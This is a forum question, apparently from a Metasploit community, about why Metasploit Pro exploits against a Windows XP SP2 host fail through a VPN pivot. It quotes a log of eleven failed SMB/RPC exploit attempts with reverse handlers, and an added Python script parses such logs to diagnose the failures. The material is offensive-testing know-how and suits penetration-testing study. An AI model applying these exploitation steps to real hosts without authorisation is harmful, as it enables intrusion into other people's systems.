adelhasoon

Exploit succeeded on LAN but failed on WAN?

Discussion created by adelhasoon on Dec 3, 2011
Latest reply on Jan 30, 2012 by makmzl02

Hello all,


I have succeeded in exploiting WinXP SP2 in my LAN, but failed to exploit the same machine through the LAN using VPN pivoting and a Nexpose scan.

First I exploited a machine through a payload in the remote network, then ran a Nexpose scan and found 12 vulnerabilities in that WinXP SP2 machine, but failed to exploit it. These are the results of the exploit operation through Metasploit Pro:


[*] [2011.12.03-11:18:57] Minimum rank: good, transport evasion level: 0, application evasion level: 0

[*] [2011.12.03-11:18:57] Target hosts: 192.168.2.2

[+] [2011.12.03-11:18:57] Workspace:dlink Progress:1/100 (1%) Starting analysis

[+] [2011.12.03-11:18:57] Workspace:dlink Progress:2/100 (2%) Analyzing exploits: filtering by OS, vulnerability, port

[+] [2011.12.03-11:20:26] Workspace:dlink Progress:3/100 (3%) Building exploit map: matching by OS, vulnerability, port

[*] [2011.12.03-11:20:26] Matching exploits: 0 hosts processed (0 potential actions)

[+] [2011.12.03-11:20:26] Workspace:dlink Progress:4/100 (4%) Building attack plan

[*] [2011.12.03-11:20:26] Finalizing attack plan: 11 total exploits

[+] [2011.12.03-11:20:27] Workspace:dlink Progress:5/16 (31%) [1/11] 192.168.2.2:445 - Microsoft Print Spooler Service Impersonation Vulnerability

[*] [2011.12.03-11:20:30] [0001] Started reverse handler on 0.0.0.0:1024

[*] [2011.12.03-11:20:53] [0001] Trying target Windows Universal...

[*] [2011.12.03-11:20:53] [0001] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.2.2[\spoolss] ...

[*] [2011.12.03-11:21:00] [0001] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.2.2[\spoolss] ...

[-] [2011.12.03-11:21:02] [0001] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)

[+] [2011.12.03-11:21:05] Workspace:dlink Progress:6/16 (37%) [2/11] 192.168.2.2:445 - Microsoft Server Service Relative Path Stack Corruption

[*] [2011.12.03-11:21:07] [0002] Started reverse handler on 0.0.0.0:1031

[*] [2011.12.03-11:21:19] [0002] Automatically detecting the target...

[*] [2011.12.03-11:23:06] [0002] Fingerprint: Windows XP - Service Pack 2 - lang:Unknown

[*] [2011.12.03-11:23:06] [0002] We could not detect the language pack, defaulting to English

[*] [2011.12.03-11:23:06] [0002] Selected Target: Windows XP SP2 English (AlwaysOn NX)

[-] [2011.12.03-11:23:17] [0002] Exploit exception: execution expired

[+] [2011.12.03-11:23:20] Workspace:dlink Progress:7/16 (43%) [3/11] 192.168.2.2:445 - Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow

[*] [2011.12.03-11:23:20] [0003] Started reverse handler on 0.0.0.0:1032

[*] [2011.12.03-11:23:20] [0003] Connecting to the server...

[-] [2011.12.03-11:23:33] [0003] Exploit exception: The connection timed out (192.168.2.2:445).

[+] [2011.12.03-11:23:36] Workspace:dlink Progress:8/16 (50%) [4/11] 192.168.2.2:445 - Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow

[*] [2011.12.03-11:23:36] [0004] Started reverse handler on 0.0.0.0:1034

[-] [2011.12.03-11:23:55] [0004] Exploit exception: Login Failed: execution expired

[+] [2011.12.03-11:23:57] Workspace:dlink Progress:9/16 (56%) [5/11] 192.168.2.2:445 - Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow

[*] [2011.12.03-11:23:58] [0005] Started reverse handler on 0.0.0.0:1036

[-] [2011.12.03-11:24:18] [0005] Exploit exception: The connection timed out (192.168.2.2:445).

[+] [2011.12.03-11:24:21] Workspace:dlink Progress:10/16 (62%) [6/11] 192.168.2.2:445 - Microsoft Workstation Service NetAddAlternateComputerName Overflow

[*] [2011.12.03-11:24:22] [0006] Started reverse handler on 0.0.0.0:1038

[*] [2011.12.03-11:24:51] [0006] Binding to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.2.2[\BROWSER] ...

[-] [2011.12.03-11:25:06] [0006] Exploit exception: execution expired

[+] [2011.12.03-11:25:08] Workspace:dlink Progress:11/16 (68%) [7/11] 192.168.2.2:445 - Microsoft NetDDE Service Overflow

[*] [2011.12.03-11:25:09] [0007] Started reverse handler on 0.0.0.0:1039

[-] [2011.12.03-11:25:28] [0007] Exploit exception: The connection timed out (192.168.2.2:445).

[+] [2011.12.03-11:25:30] Workspace:dlink Progress:12/16 (75%) [8/11] 192.168.2.2:445 - Microsoft Plug and Play Service Overflow

[*] [2011.12.03-11:25:31] [0008] Started reverse handler on 0.0.0.0:1040

[*] [2011.12.03-11:25:31] [0008] Connecting to the SMB service...

[-] [2011.12.03-11:25:48] [0008] Error: Rex::ConnectionTimeout The connection timed out (192.168.2.2:445).

[*] [2011.12.03-11:25:48] [0008] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.2.2[\browser] ...

[-] [2011.12.03-11:26:03] [0008] Exploit exception: The connection timed out (192.168.2.2:445).

[+] [2011.12.03-11:26:06] Workspace:dlink Progress:13/16 (81%) [9/11] 192.168.2.2:445 - Microsoft Server Service NetpwPathCanonicalize Overflow

[*] [2011.12.03-11:26:07] [0009] Started reverse handler on 0.0.0.0:1041

[*] [2011.12.03-11:27:08] [0009] Windows XP SP2 is not exploitable

[+] [2011.12.03-11:27:11] Workspace:dlink Progress:14/16 (87%) [10/11] 192.168.2.2:445 - Microsoft Services MS06-066 nwapi32.dll

[*] [2011.12.03-11:27:12] [0010] Started reverse handler on 0.0.0.0:1042

[*] [2011.12.03-11:27:12] [0010] Connecting to the SMB service...

[-] [2011.12.03-11:27:30] [0010] Exploit exception: Login Failed: execution expired

[+] [2011.12.03-11:28:03] Workspace:dlink Progress:15/16 (93%) [11/11] 192.168.2.2:445 - Microsoft Services MS06-066 nwwks.dll

[*] [2011.12.03-11:28:04] [0011] Started reverse handler on 0.0.0.0:1043

[*] [2011.12.03-11:28:04] [0011] Connecting to the SMB service...

[*] [2011.12.03-11:28:57] [0011] Binding to e67ab081-9844-3521-9d32-834f038001c0:1.0@ncacn_np:192.168.2.2[\nwwks] ...

[-] [2011.12.03-11:29:08] [0011] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)

[+] [2011.12.03-11:29:10] Workspace:dlink Progress:16/16 (100%) Complete (0 sessions opened, 1 host targeted, 1 host skipped)


I need to know the reason, and whether there are some parameters or settings I should configure.


Thank you
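An added example, not part of the original post and not Rapid7's code: a small Python parser for exploit-run log lines of the shape quoted above. A constructed subset of those lines is embedded as sample input. It ties each numbered attempt (the `[0001]`-style tag) to its exploit header, classifies how the attempt ended, and counts the classes. The outcome names (`timeout`, `access_denied`, `not_exploitable`, `other_error`) and the function names are this example's own. Sorting a run this way separates attempts that never completed a connection to port 445 through the pivot (timeouts and `execution expired`) from attempts that reached the service and were refused (`STATUS_ACCESS_DENIED`) or were judged not exploitable, which is the first thing to establish before changing exploit settings.

```python
"""Summarize Metasploit Pro exploit-run log lines by outcome class (added example)."""
import re
from collections import Counter

# Constructed sample input: a subset of the log lines quoted in the post above.
SAMPLE_LOG = r"""
[+] [2011.12.03-11:20:27] Workspace:dlink Progress:5/16 (31%) [1/11] 192.168.2.2:445 - Microsoft Print Spooler Service Impersonation Vulnerability
[*] [2011.12.03-11:20:30] [0001] Started reverse handler on 0.0.0.0:1024
[*] [2011.12.03-11:20:53] [0001] Trying target Windows Universal...
[*] [2011.12.03-11:20:53] [0001] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.2.2[\spoolss] ...
[-] [2011.12.03-11:21:02] [0001] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
[+] [2011.12.03-11:21:05] Workspace:dlink Progress:6/16 (37%) [2/11] 192.168.2.2:445 - Microsoft Server Service Relative Path Stack Corruption
[*] [2011.12.03-11:21:07] [0002] Started reverse handler on 0.0.0.0:1031
[*] [2011.12.03-11:23:06] [0002] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[-] [2011.12.03-11:23:17] [0002] Exploit exception: execution expired
[+] [2011.12.03-11:23:20] Workspace:dlink Progress:7/16 (43%) [3/11] 192.168.2.2:445 - Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
[*] [2011.12.03-11:23:20] [0003] Started reverse handler on 0.0.0.0:1032
[-] [2011.12.03-11:23:33] [0003] Exploit exception: The connection timed out (192.168.2.2:445).
[+] [2011.12.03-11:25:30] Workspace:dlink Progress:12/16 (75%) [8/11] 192.168.2.2:445 - Microsoft Plug and Play Service Overflow
[*] [2011.12.03-11:25:31] [0008] Started reverse handler on 0.0.0.0:1040
[-] [2011.12.03-11:25:48] [0008] Error: Rex::ConnectionTimeout The connection timed out (192.168.2.2:445).
[-] [2011.12.03-11:26:03] [0008] Exploit exception: The connection timed out (192.168.2.2:445).
[+] [2011.12.03-11:26:06] Workspace:dlink Progress:13/16 (81%) [9/11] 192.168.2.2:445 - Microsoft Server Service NetpwPathCanonicalize Overflow
[*] [2011.12.03-11:26:07] [0009] Started reverse handler on 0.0.0.0:1041
[*] [2011.12.03-11:27:08] [0009] Windows XP SP2 is not exploitable
[+] [2011.12.03-11:29:10] Workspace:dlink Progress:16/16 (100%) Complete (0 sessions opened, 1 host targeted, 1 host skipped)
"""

# "[n/total] host:port - Exploit name" opens each attempt; n matches the later [000n] tag.
HEADER_RE = re.compile(r"\[(\d+)/(\d+)\] (\S+):(\d+) - (.+)$")
# Lines belonging to one attempt carry a four-digit id right after the timestamp.
ID_RE = re.compile(r"\] \[(\d{4})\] (.*)$")
HANDLER_RE = re.compile(r"Started reverse handler on (\S+):(\d+)")
COMPLETE_RE = re.compile(r"Complete \((\d+) sessions? opened")


def classify(message):
    """Map one per-attempt message to an outcome class, or None if it is progress chatter."""
    m = message.lower()
    if "connection timed out" in m or "connectiontimeout" in m or "execution expired" in m:
        return "timeout"          # never finished talking to 445: a path/pivot problem first
    if "status_access_denied" in m:
        return "access_denied"    # SMB/RPC reached, request refused by the target
    if "not exploitable" in m:
        return "not_exploitable"  # module's own check ruled the target out
    if "exploit exception" in m or m.startswith("error:"):
        return "other_error"
    return None


def summarize(log_text):
    """Return per-attempt records, outcome counts, and the session count from the Complete line."""
    attempts, sessions_opened = {}, None
    for line in log_text.splitlines():
        h = HEADER_RE.search(line)
        if h:
            attempts[int(h.group(1))] = {
                "target": f"{h.group(3)}:{h.group(4)}", "name": h.group(5),
                "handler": None, "outcome": "no_result", "detail": "",
            }
            continue
        c = COMPLETE_RE.search(line)
        if c:
            sessions_opened = int(c.group(1))
            continue
        t = ID_RE.search(line)
        if not t:
            continue
        idx, message = int(t.group(1)), t.group(2)
        rec = attempts.setdefault(idx, {"target": "?", "name": "?", "handler": None,
                                        "outcome": "no_result", "detail": ""})
        hm = HANDLER_RE.search(message)
        if hm:
            rec["handler"] = f"{hm.group(1)}:{hm.group(2)}"  # listener bind, not the LHOST the payload calls back to
            continue
        outcome = classify(message)
        if outcome:
            rec["outcome"], rec["detail"] = outcome, message  # last failure line wins (e.g. attempt 8 logs two)
    counts = Counter(r["outcome"] for r in attempts.values())
    return {"attempts": attempts, "counts": counts, "sessions_opened": sessions_opened}


def transport_failures(summary):
    """Attempt ids that timed out, i.e. the ones to re-test with a plain TCP connect through the pivot."""
    return [i for i, r in summary["attempts"].items() if r["outcome"] == "timeout"]


def report(summary):
    """Human-readable summary lines: session total, class counts, then one line per attempt."""
    lines = [f"sessions opened: {summary['sessions_opened']}"]
    lines += [f"{outcome}: {n}" for outcome, n in sorted(summary["counts"].items())]
    for idx, rec in sorted(summary["attempts"].items()):
        lines.append(f"[{idx:04d}] {rec['outcome']:<15} {rec['target']} {rec['name']} (handler {rec['handler']})")
    return lines


if __name__ == "__main__":
    print("\n".join(report(summarize(SAMPLE_LOG))))
```

On the sample above the report shows three timeouts, one access-denied and one not-exploitable verdict. The `handler` field is only the local bind address the listener was started on (`0.0.0.0:port` in the log); whether the target can actually reach the address and port the reverse payload was built with is not visible in these lines and has to be checked separately when the target sits behind a pivot.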